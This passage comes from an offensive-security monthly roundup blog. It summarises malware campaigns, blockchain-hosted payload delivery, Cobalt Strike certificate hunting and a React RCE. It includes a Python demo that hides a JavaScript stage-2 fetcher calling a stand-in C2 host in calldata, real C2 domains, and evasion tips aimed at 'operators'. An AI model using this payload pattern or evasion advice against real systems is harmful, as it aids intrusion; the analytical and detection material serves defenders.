  4. Loader decrypts and executes, delivering a Node.js RAT

The RAT targets cryptocurrency wallet extensions, credential files, and browser sessions. Full IOCs, YARA rules, and a deobfuscation tool (PayloadFetcher.js) are available in the Ransom-ISAC GitHub repo.

For operators, this is an excellent evasion primitive. Blockchain explorer and RPC APIs are rarely blocked in corporate networks (they carry legitimate wallet and DeFi traffic and sit behind reputable hosts), and the cost of hosting payloads on-chain is negligible. It's also immune to traditional domain/IP blocklists, because the same payload is reachable through any public node.
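Both the EtherHiding write-up and the Cross-Chain TxDataHiding steps above come down to the same primitive, so one added example (mine, not Mandiant's or Ransom-ISAC's tooling) in Python serves both. It simulates the storage side, a function selector followed by XOR-obfuscated JavaScript hex-encoded like transaction input data, and then the analyst side: recovering a repeating XOR key from the calldata alone by crib-dragging a string any Node loader has to contain. The selector, key and sample script are constructed; the technique is the one the posts describe.

```python
SELECTOR = bytes.fromhex("a1b2c3d4")   # constructed 4-byte selector, not any real contract's

# Constructed stage-2 fetcher standing in for the obfuscated loader payload.
SAMPLE_JS = ('const h = require("https");\n'
             'h.get("https://c2.example.invalid/stage2", r => r.pipe(process.stdout));\n')


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def hide_in_calldata(js: str, key: bytes) -> str:
    """Attacker side (simulated): selector + XOR'd payload, hex-encoded like tx input data."""
    return "0x" + (SELECTOR + xor_bytes(js.encode(), key)).hex()


def calldata_body(calldata: str) -> bytes:
    raw = bytes.fromhex(calldata[2:] if calldata.startswith("0x") else calldata)
    return raw[4:]                                  # drop the selector, keep the blob


def decode_with_key(calldata: str, key: bytes) -> str:
    """What the loader does once it has the key embedded in it."""
    return xor_bytes(calldata_body(calldata), key).decode("utf-8", "replace")


def looks_like_script(pt: bytes) -> bool:
    """Cheap plausibility test: almost entirely printable and contains a call expression."""
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in pt)
    return printable / max(len(pt), 1) > 0.95 and b"(" in pt and b")" in pt


def recover_xor_key(calldata: str, crib: bytes = b"require(", max_len: int = 16):
    """Analyst side: recover a repeating XOR key of length <= len(crib) without the loader.

    For every candidate key length L and every offset, XOR the crib against the
    ciphertext; if the result repeats with period L it is the key (rotated by the
    offset), so un-rotate it, decrypt everything and keep the first plausible result.
    """
    ct = calldata_body(calldata)
    for length in range(1, min(max_len, len(crib)) + 1):
        for off in range(0, len(ct) - len(crib) + 1):
            derived = xor_bytes(ct[off:off + len(crib)], crib)
            if any(derived[j] != derived[j - length] for j in range(length, len(crib))):
                continue
            key = bytes(derived[(k - off) % length] for k in range(length))
            pt = xor_bytes(ct, key)
            if looks_like_script(pt):
                return key, pt.decode("utf-8", "replace")
    return None


if __name__ == "__main__":
    blob = hide_in_calldata(SAMPLE_JS, b"\x5a\x13\x77")
    print(blob[:40], "...")
    recovered = recover_xor_key(blob)
    print(recovered[0].hex(), recovered[1], sep="\n")
```

The defensive lesson is the flip side of the "resilient C2" pitch: because the blob is public and the obfuscation is a short XOR, anyone with the transaction hash can pull the stage without the loader. Mandiant's EtherHiding variant reads its payload through read-only contract calls rather than raw calldata; the decode step is the same once you have the bytes.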

Malware Deep Dives: Stealers, RATs, and Evasion

ValleyRAT Campaigns: DLL Side-Loading and Chinese Targeting

Multiple researchers documented ValleyRAT campaigns targeting Chinese-speaking users. Seqrite's Operation Silk Lure and CN-SEC's analysis show delivery via spear-phishing LNK files that extract VBS scripts, which then download a DLL side-loading chain. The final payload checks for the presence of WeChat or DingTalk registry keys to verify it's running on a Chinese system before activating.

The malware uses keytool.exe (a legitimate Java utility) to side-load a malicious jli.dll that decrypts and injects the RAT. Persistence is via scheduled tasks named Security or similar system-sounding names. ValleyRAT supports keylogging, screenshots, clipboard theft, and system recon.

Nextron Systems published another variant from the Silver Fox APT that trojanizes installers for Telegram, WinSCP, Chrome, and Microsoft Teams. This variant uses a BYOVD (Bring Your Own Vulnerable Driver) rootkit to terminate EDR processes and adds Windows Defender exclusions for entire drives before deploying ValleyRAT. The IOCs include a SHA256 hash (e80c3e4fc6ad0134bec666226561e138cdac4381740123d98f6662e72bf268db) and detailed TTPs available on OTX.

Maverick Banker: WhatsApp Worm with Donut Loaders

Kaspersky's analysis of Maverick shows a Brazilian banking trojan that self-propagates via WhatsApp. The initial infection is a PowerShell script delivered through phishing. Once executed, it uses Donut to load .NET shellcode, hijacks the victim's WhatsApp Web session using Selenium automation, and sends malicious messages to all contacts.

The payload targets Brazilian banks and cryptocurrency wallets using overlay attacks and clipboard hijacking. Kaspersky blocked over 62,000 infection attempts in early October. The C2 domains (casadecampoamazonas.com, sorvetenopote.com) are hardcoded, and the credentials for the C2 are embedded in the script--operational security is not this group's strong suit.

For operators testing social engineering chains, the WhatsApp propagation technique is portable. The use of Donut for in-memory .NET execution is a nice touch for evading signature-based detection.

Offensive Tooling Updates

nightMARE 0.16: Rizin-Powered Malware Analysis

Elastic Security Labs released nightMARE v0.16, a Python library for malware reverse engineering that integrates Rizin for disassembly and Unicorn for emulation. The library supports config extraction for 13 malware families, including LUMMA stealer.

The tutorial walks through extracting C2 domains and encryption keys from a packed LUMMA sample using dynamic emulation and memory analysis. For operators doing malware RE or building your own config extractors, this is a solid framework. The GitHub repo includes examples and plugins for common packers.

Autoswagger: OpenAPI/Swagger Endpoint Discovery and Fuzzing

Intruder.io released Autoswagger, a CLI tool for automated discovery and testing of OpenAPI and Swagger API endpoints. The tool enumerates common spec paths (/swagger.json, /openapi.json, /api-docs), parses the schema, and fuzzes endpoints to identify unauthenticated access, PII leaks, and exposed secrets.

For red teams doing API reconnaissance, this automates the tedious parts of endpoint enumeration and gives you a quick win list of publicly exposed admin functions and debug endpoints. The blog post includes case studies of real-world API misconfigurations discovered using the tool.

Cobalt Strike Detection: Certificate Fingerprinting

Censys published a guide to hunting Cobalt Strike C2 infrastructure via TLS certificate analysis. Cobalt Strike's certificate generation is predictable: self-signed certs with matching subject/issuer DNs and a fixed RDN ordering (C→ST→L→O→OU→CN). By querying internet-wide scan data for these patterns, researchers identified multiple active C2 servers, including infrastructure linked to known threat groups.

The blog includes Censys queries and IOC lists for defenders, but for offensive operators, the lesson is OPSEC: if you're running default CS profiles, your C2 is trivially fingerprintable. Customize your Malleable C2 profiles to randomize certificate fields and break the RDN pattern.
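To turn that into something you can run over your own scan data, here is an added example (mine, not Censys's queries) in Python. It checks the two structural tells described above, subject equal to issuer and the C, ST, L, O, OU, CN attribute order, against certificates in the tuple-of-RDNs shape that ssl.getpeercert() returns, and includes a parser for the default output of openssl x509 -noout -subject so you can feed it text from the command line. The sample values are constructed and are not claimed to be Cobalt Strike's defaults.

```python
CS_DEFAULT_ORDER = ("countryName", "stateOrProvinceName", "localityName",
                    "organizationName", "organizationalUnitName", "commonName")

SHORT_TO_LONG = {"C": "countryName", "ST": "stateOrProvinceName", "L": "localityName",
                 "O": "organizationName", "OU": "organizationalUnitName", "CN": "commonName",
                 "emailAddress": "emailAddress"}


def rdn_sequence(name):
    """Flatten ssl.getpeercert()'s tuple-of-RDNs into attribute types in encoding order."""
    return [attr for rdn in name for attr, _value in rdn]


def parse_openssl_dn(text: str):
    """Parse `openssl x509 -noout -subject` default output ("subject=C = XX, ST = ...")
    into the same tuple-of-RDNs shape.

    Assumes no commas inside values and the default name options; -nameopt RFC2253
    prints the RDNs in reverse order and must not be fed to this function.
    """
    if text.startswith(("subject=", "issuer=")):
        text = text.split("=", 1)[1]
    rdns = []
    for part in text.split(","):
        key, _, value = part.partition("=")
        key, value = key.strip(), value.strip()
        rdns.append(((SHORT_TO_LONG.get(key, key), value),))
    return tuple(rdns)


def cert_fingerprint_flags(cert: dict):
    """The structural tells the Censys write-up describes, as human-readable flags."""
    subject, issuer = cert.get("subject", ()), cert.get("issuer", ())
    flags = []
    if subject and subject == issuer:
        flags.append("self-signed (subject == issuer)")
    if tuple(rdn_sequence(subject)) == CS_DEFAULT_ORDER:
        flags.append("RDN order C>ST>L>O>OU>CN")
    return flags


def is_cs_like(cert: dict) -> bool:
    """Both tells together; either one alone is common in benign infrastructure."""
    return len(cert_fingerprint_flags(cert)) == 2


def triage(certs):
    """Run over (host, cert) pairs and return the hosts worth a closer look."""
    return [host for host, cert in certs if is_cs_like(cert)]


if __name__ == "__main__":
    # Constructed sample; the values are placeholders, not a known default certificate.
    subj = parse_openssl_dn("subject=C = XX, ST = Nowhere, L = Somewhere, "
                            "O = Example Corp, OU = Ops, CN = Example Listener")
    print(triage([("198.51.100.10:443", {"subject": subj, "issuer": subj})]))
```

The order check is deliberately on the certificate's encoding order, which is what both getpeercert() and OpenSSL's default -subject output preserve. This is also the operator-side checklist: a Malleable C2 profile that drops or reorders those attributes, or gets the listener a CA-issued certificate, fails both tests.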

React RCE: The December Surprise (CVE-2025-55182)

While most of the dataset is from October, this one's too good to skip. React's security advisory for CVE-2025-55182 describes a pre-authentication remote code execution flaw in React Server Components (versions 19.0.0–19.2.0). The vulnerability affects react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack, which are pulled in by frameworks and toolchains like Next.js and the Vite RSC plugin, among others.

The bug is an unsafe deserialization issue in the server-side component transport layer. By sending a crafted request to a Server Function endpoint, an attacker can execute arbitrary code on the server with no authentication required. CVSS 10.0. Patches are available (React 19.0.1, 19.1.2, 19.2.1+), and hosting providers (Vercel, Cloudflare, Netlify) have deployed WAF rules as interim mitigations.

Public PoCs started appearing within hours of disclosure, though some are non-functional against production Next.js builds. For operators, this is a critical target if you're testing web apps built with modern React stacks. The Facebook security advisory and OSS-security mailing list discussion have more details.

Closing Thoughts: Build Chains, Not Exploits

October's crop of disclosures reinforced a core principle: the most effective attacks chain multiple primitives. Oracle's RCE required SSRF + CRLF + XSLT injection. Gladinet's exploit needed LFI + a leaked machineKey for ViewState forgery. WatchGuard required IKEv2 knowledge + ROP + shellcode. And the APTs are chaining LLMs for phishing, DLL hijacking for execution, and blockchain transactions for C2.

The operators who succeed aren't necessarily the ones finding zero-days--they're the ones who can reliably chain known techniques into full compromise. That's what separates a crash from a shell, and a shell from persistent access with exfil.

So keep building your chains. Study the PoCs. Understand the primitives. And remember that every abstraction layer--whether it's ASP.NET ViewState, React Server Components, or eBPF hooks--is a potential seam to exploit.

The tradecraft is out there. Use it wisely.

-- UncleSp1d3r

Note: I wanted to get this out at the end of October, but November was a rollercoaster ride. We’ll start doing month-in-review rollups going forward.


Appendix: Vendor Patches & Advisories

For those tracking October's patch releases:

Microsoft October 2025 Patch Tuesday:

  • Security Update Guide – 172 CVEs including 6 zero-days
  • CVE-2025-59230 (RasMan EoP – CISA KEV)
  • CVE-2025-24990, CVE-2025-24052 (Agere driver EoPs – 24990 actively exploited, 24052 publicly disclosed with a PoC)
